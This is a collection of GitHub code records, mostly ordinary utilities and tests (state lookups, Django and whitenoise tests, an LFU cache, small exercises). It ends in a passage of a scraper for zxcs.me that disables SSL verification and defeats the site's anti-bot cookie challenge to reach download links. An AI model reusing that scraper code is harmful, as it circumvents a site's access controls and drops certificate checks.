\"MD\": \"Maryland\",\n \"MA\": \"Massachusetts\",\n \"MI\": \"Michigan\",\n \"MN\": \"Minnesota\",\n \"MS\": \"Mississippi\",\n \"MO\": \"Missouri\",\n \"MT\": \"Montana\",\n \"NE\": \"Nebraska\",\n \"NV\": \"Nevada\",\n \"NH\": \"New Hampshire\",\n \"NJ\": \"New Jersey\",\n \"NM\": \"New Mexico\",\n \"NY\": \"New York\",\n \"NC\": \"North Carolina\",\n \"ND\": \"North Dakota\",\n \"OH\": \"Ohio\",\n \"OK\": \"Oklahoma\",\n \"OR\": \"Oregon\",\n \"PA\": \"Pennsylvania\",\n \"PR\": \"Puerto Rico\",\n \"RI\": \"Rhode Island\",\n \"SC\": \"South Carolina\",\n \"SD\": \"South Dakota\",\n \"TN\": \"Tennessee\",\n \"TX\": \"Texas\",\n \"UT\": \"Utah\",\n \"VT\": \"Vermont\",\n \"VA\": \"Virginia\",\n \"WA\": \"Washington\",\n \"WV\": \"West Virginia\",\n \"WI\": \"Wisconsin\",\n \"WY\": \"Wyoming\"}\n\ndef get_state_abbrev(state):\n \"\"\"\n function to return state abbreviation given state name\n :param abbrev: variable-character string with state name\n :return: 2-character string with state abbreviation\n \"\"\"\n return [k for k,v in states.items() if v == state][0]\n\ndef get_state_name(abbrev):\n \"\"\"\n function to return state name given abbreviation\n :param abbrev: 2-character string with state abbreviation\n :return: variable-character string with state name\n \"\"\"\n return states[abbrev]\n","repo_name":"wel51x/lambdata","sub_path":"lambdata_wel51x/df_utils.py","file_name":"df_utils.py","file_ext":"py","file_size_in_byte":4275,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"4803072104","text":"from django.test import TestCase\nfrom qa.models import Question, QuestionComment\nfrom qa import application\n\n\nclass ApplicationQuestionTests(TestCase):\n\n def setUp(self):\n from qa.models import Question, User\n user = User.objects.create()\n self.user = user\n\n def test_ask(self):\n question = Question(title='Q_ask', author=self.user)\n application.question.ask(question)\n\n question_test = Question.objects.get(title='Q_ask')\n\n self.assertIsNotNone(question_test)\n\n def test_vote_up(self):\n votes_to_up = 1\n question = Question.objects.create(title='Q_vote_up',\n up_votes=votes_to_up,\n author=self.user)\n application.question.vote_up(question)\n\n question_test = Question.objects.get(title='Q_vote_up')\n self.assertEqual(question_test.up_votes,\n votes_to_up + 1)\n\n def test_vote_down(self):\n votes_to_down = 1\n question = Question.objects.create(title='Q_vote_down',\n down_votes=votes_to_down,\n author=self.user)\n application.question.vote_down(question)\n\n question_test = Question.objects.get(title='Q_vote_down')\n self.assertEqual(question_test.down_votes,\n votes_to_down + 1)\n\n def test_comment(self):\n question = Question.objects.create(title='Q_comment',\n author=self.user)\n comment = QuestionComment.objects.create(body='comment',\n author=self.user,\n question=question)\n\n #application.question.comment(question, comment)\n\n question_test = Question.objects.get(title='Q_comment')\n\n print(question_test.comments.get())\n\n comment = QuestionComment.objects.create(body='comment',\n author=self.user,\n question=question)\n\n self.assertEqual(comment, question_test.comments.get())\n","repo_name":"gcca/niebla","sub_path":"niebla/qa/tests/test_application_question.py","file_name":"test_application_question.py","file_ext":"py","file_size_in_byte":2176,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"15085675176","text":"from __future__ import annotations\n\nimport os\nimport re\nimport shutil\nimport tempfile\nfrom posixpath import basename\n\nimport django\nimport pytest\nfrom django.conf import settings\nfrom django.contrib.staticfiles.storage import HashedFilesMixin\nfrom django.contrib.staticfiles.storage import staticfiles_storage\nfrom django.core.management import call_command\nfrom django.test.utils import override_settings\nfrom django.utils.functional import empty\n\nfrom tests.utils import Files\nfrom whitenoise.storage import CompressedManifestStaticFilesStorage\nfrom whitenoise.storage import MissingFileError\n\n\n@pytest.fixture()\ndef setup():\n staticfiles_storage._wrapped = empty\n files = Files(\"static\")\n tmp = tempfile.mkdtemp()\n with override_settings(\n STATICFILES_DIRS=[files.directory],\n STATIC_ROOT=tmp,\n ):\n yield settings\n staticfiles_storage._wrapped = empty\n shutil.rmtree(tmp)\n\n\n@pytest.fixture()\ndef _compressed_storage(setup):\n backend = \"whitenoise.storage.CompressedStaticFilesStorage\"\n if django.VERSION >= (4, 2):\n storages = {\n \"STORAGES\": {\n **settings.STORAGES,\n \"staticfiles\": {\"BACKEND\": backend},\n }\n }\n else:\n storages = {\"STATICFILES_STORAGE\": backend}\n\n with override_settings(**storages):\n yield\n\n\n@pytest.fixture()\ndef _compressed_manifest_storage(setup):\n backend = \"whitenoise.storage.CompressedManifestStaticFilesStorage\"\n if django.VERSION >= (4, 2):\n storages = {\n \"STORAGES\": {\n **settings.STORAGES,\n \"staticfiles\": {\"BACKEND\": backend},\n }\n }\n else:\n storages = {\"STATICFILES_STORAGE\": backend}\n\n with override_settings(**storages, WHITENOISE_KEEP_ONLY_HASHED_FILES=True):\n call_command(\"collectstatic\", verbosity=0, interactive=False)\n\n\ndef test_compressed_static_files_storage(_compressed_storage):\n call_command(\"collectstatic\", verbosity=0, interactive=False)\n\n for name in [\"styles.css.gz\", \"styles.css.br\"]:\n path = os.path.join(settings.STATIC_ROOT, name)\n assert os.path.exists(path)\n\n\ndef test_compressed_static_files_storage_dry_run(_compressed_storage):\n call_command(\"collectstatic\", \"--dry-run\", verbosity=0, interactive=False)\n\n for name in [\"styles.css.gz\", \"styles.css.br\"]:\n path = os.path.join(settings.STATIC_ROOT, name)\n assert not os.path.exists(path)\n\n\ndef test_make_helpful_exception(_compressed_manifest_storage):\n class TriggerException(HashedFilesMixin):\n def exists(self, path):\n return False\n\n exception = None\n try:\n TriggerException().hashed_name(\"/missing/file.png\")\n except ValueError as e:\n exception = e\n helpful_exception = CompressedManifestStaticFilesStorage().make_helpful_exception(\n exception, \"styles/app.css\"\n )\n assert isinstance(helpful_exception, MissingFileError)\n\n\ndef test_unversioned_files_are_deleted(_compressed_manifest_storage):\n name = \"styles.css\"\n versioned_url = staticfiles_storage.url(name)\n versioned_name = basename(versioned_url)\n name_pattern = re.compile(\"^\" + name.replace(\".\", r\"\\.([0-9a-f]+\\.)?\") + \"$\")\n remaining_files = [\n f for f in os.listdir(settings.STATIC_ROOT) if name_pattern.match(f)\n ]\n assert [versioned_name] == remaining_files\n\n\ndef test_manifest_file_is_left_in_place(_compressed_manifest_storage):\n manifest_file = os.path.join(settings.STATIC_ROOT, \"staticfiles.json\")\n assert os.path.exists(manifest_file)\n\n\ndef test_manifest_strict_attribute_is_set():\n with override_settings(WHITENOISE_MANIFEST_STRICT=True):\n storage = CompressedManifestStaticFilesStorage()\n assert storage.manifest_strict is True\n with override_settings(WHITENOISE_MANIFEST_STRICT=False):\n storage = CompressedManifestStaticFilesStorage()\n assert storage.manifest_strict is False\n","repo_name":"evansd/whitenoise","sub_path":"tests/test_storage.py","file_name":"test_storage.py","file_ext":"py","file_size_in_byte":3953,"program_lang":"python","lang":"en","doc_type":"code","stars":2332,"dataset":"github-code","pt":"69"}
+{"seq_id":"25458406507","text":"#!/usr/bin/python3\n\"\"\"Least Frequently Used caching module.\n\"\"\"\n\nfrom base_caching import BaseCaching\n\n\nclass LFUCache(BaseCaching):\n \"\"\"Represents an object that allows storing and\n retrieving items from a dictionary with a LFU\n removal mechanism when the limit is reached.\n \"\"\"\n\n def __init__(self):\n \"\"\"Initializes the cache instance.\n \"\"\"\n super().__init__()\n self.keys = []\n self.uses = {}\n\n def put(self, key, item):\n \"\"\"Adds an item in the cache.\n \"\"\"\n if key is not None and item is not None:\n if (len(self.keys) == BaseCaching.MAX_ITEMS and\n key not in self.keys):\n discard = self.keys.pop(self.keys.index(self.findLFU()))\n del self.cache_data[discard]\n del self.uses[discard]\n print('DISCARD: {:s}'.format(discard))\n self.cache_data[key] = item\n if key not in self.keys:\n self.keys.append(key)\n self.uses[key] = 0\n else:\n self.keys.append(self.keys.pop(self.keys.index(key)))\n self.uses[key] += 1\n\n def get(self, key):\n ''' Return value stored in `key` key of cache.\n If key is None or does not exist in cache, return None. '''\n if key is not None and key in self.cache_data:\n self.keys.append(self.keys.pop(self.keys.index(key)))\n self.uses[key] += 1\n return self.cache_data[key]\n return None\n\n def findLFU(self):\n ''' Return key of least frequently used item in cache.\n If multiple items have the same amount of uses, return the least\n recently used one. '''\n items = list(self.uses.items())\n freqs = [item[1] for item in items]\n least = min(freqs)\n\n lfus = [item[0] for item in items if item[1] == least]\n for key in self.keys:\n if key in lfus:\n return key\n","repo_name":"M1urray/alx-backend","sub_path":"0x01-caching/100-lfu_cache.py","file_name":"100-lfu_cache.py","file_ext":"py","file_size_in_byte":1988,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"36710743826","text":"#\n# @lc app=leetcode id=326 lang=python3\n#\n# [326] Power of Three\n#\n\n# @lc code=start\nclass Solution:\n def isPowerOfThree(self, n: int) -> bool:\n result = 1\n while result <= n:\n if result == n:\n return True\n result *= 3\n \n return False\n# @lc code=end\n\n","repo_name":"kjonsson/leetcode","sub_path":"326.power-of-three.py","file_name":"326.power-of-three.py","file_ext":"py","file_size_in_byte":328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"22043707132","text":"class Account:\n def __init__(self, owner, balance=0):\n self.owner = owner\n self.balance = balance\n\n def __str__(self):\n return f'Account owner: {self.owner}\\nAccount balance: ${self.balance}'\n\n def deposit(self, deposit_amt):\n self.balance += deposit_amt\n print('Deposit Accepted')\n\n def withdraw(self, wd_amount):\n if self.balance >= wd_amount:\n self.balance -= wd_amount\n print('Withdrawal Accepted')\n else:\n print('Sorry, Funds Unavailable!')\n\n# 1. Instantiate the class\nacct1 = Account('Celine',100)\nprint(acct1)\n\n# 3. Show the account owner attribute\nprint(acct1.owner)\n\n# 5. Make a series of deposits and withdrawals\nacct1.deposit(50)\n\nacct1.withdraw(75)\n\n# 6. Make a withdrawal that exceeds the available balance\nacct1.withdraw(500)\n\nprint(acct1.balance)\n","repo_name":"Surai98/class_bankaccount","sub_path":"challenge.py","file_name":"challenge.py","file_ext":"py","file_size_in_byte":858,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"21309186488","text":"import json\nimport logging\nimport requests\nimport ssl\nssl.HAS_SNI = False\nrequests.packages.urllib3.disable_warnings()\nimport execjs\nimport re\n\nLOG = logging.getLogger(\"ZXCS\")\nLOG.setLevel(logging.INFO)\nF = logging.FileHandler(\"zxcs.log\", \"a\", encoding=\"utf-8\")\nF.setFormatter(logging.Formatter('%(asctime)s:%(message)s'))\nLOG.addHandler(F)\n\npro = {\n \"http\": None,\n \"https\": None\n}\n\nheader = {\n \"user-agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36 Edg/101.0.1210.39\",\n \"sec-ch-ua\": '''\" Not A;Brand\";v=\"99\", \"Chromium\";v=\"101\", \"Microsoft Edge\";v=\"101\"''',\n \"sec-ch-ua-mobile\": \"?0\",\n \"sec-ch-ua-platform\": \"Windows\",\n \"sec-fetch-dest\": \"empty\",\n \"sec-fetch-mode\": \"cors\",\n \"sec-fetch-site\": \"same-site\",\n \"dnt\": \"1\",\n \"accept\": \"application/json, text/plain, */*\",\n \"accept-encoding\": \"utf-8\",\n \"accept-language\": \"zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6\",\n \"host\": \"zxcs.me\",\n \"referer\": \"http://zxcs.me/\",\n \"cookie\":\"security_session_verify=453a822f276fca5c9d8b898130b7e7bd; srcurl=687474703a2f2f7a7863732e6d652f\"\n}\n\nIP = \"92.242.62.123\"\n\nclass ZXCS():\n def __init__(self) -> None:\n self.url = f\"http://{IP}/\"\n self.s = requests.session()\n self.s.trust_env = False\n self.s.keep_alive = False\n \n def get(self, path):\n URL = f\"{self.url}{path}\"\n r = self.s.get(url=URL, proxies=pro, headers=header, verify=False)\n LOG.info(f\"GET:\\t{r.status_code}\\t{self.url}{path}\")\n return r\n \n def antiBOT(self):\n r = self.s.get(self.url,verify=False,headers=header,allow_redirects=False)\n cookies = r.headers[\"Set-Cookie\"].split(\";\")[0]\n LOG.info(f\"ANTIBOT:\\t{r.status_code}\\t{self.url}\\t{cookies}\")\n cookies = \"{\\\"\" + cookies.replace(\";\",\"\\\",\\\"\").replace(\"=\",\"\\\":\\\"\").replace(\" \",\"\") + \"\\\"}\"\n Cookies = json.loads(cookies)\n for i in Cookies:\n cookies = i + \"=\" + Cookies[i] + \"; srcurl=687474703a2f2f7a7863732e6d652f\"\n header[\"Cookie\"] = cookies\n \n r = self.s.get(self.url + \"?security_verify_data=\" + self.stringToHex(Cookies[\"security_session_verify\"]),verify=False,headers=header,allow_redirects=False)\n cookies = r.headers[\"Set-Cookie\"].split(\";\")[0]\n LOG.info(f\"ANTIBOT:\\t{r.status_code}\\t{self.url}\\t{cookies}\")\n \n @staticmethod\n def stringToHex(str):\n js = '''function stringToHex(str) {\n var val = \"\";\n for (var i = 0; i < str.length; i++) {\n if (val == \"\")\n val = str.charCodeAt(i).toString(16);\n else\n val += str.charCodeAt(i).toString(16);\n }\n return val;\n }'''\n run = execjs.compile(js)\n return run.call(\"stringToHex\",str)\n \n def get_download_url(self,id):\n r = self.get(path=f\"download.php?id={id}\")\n url = re.findall(r'''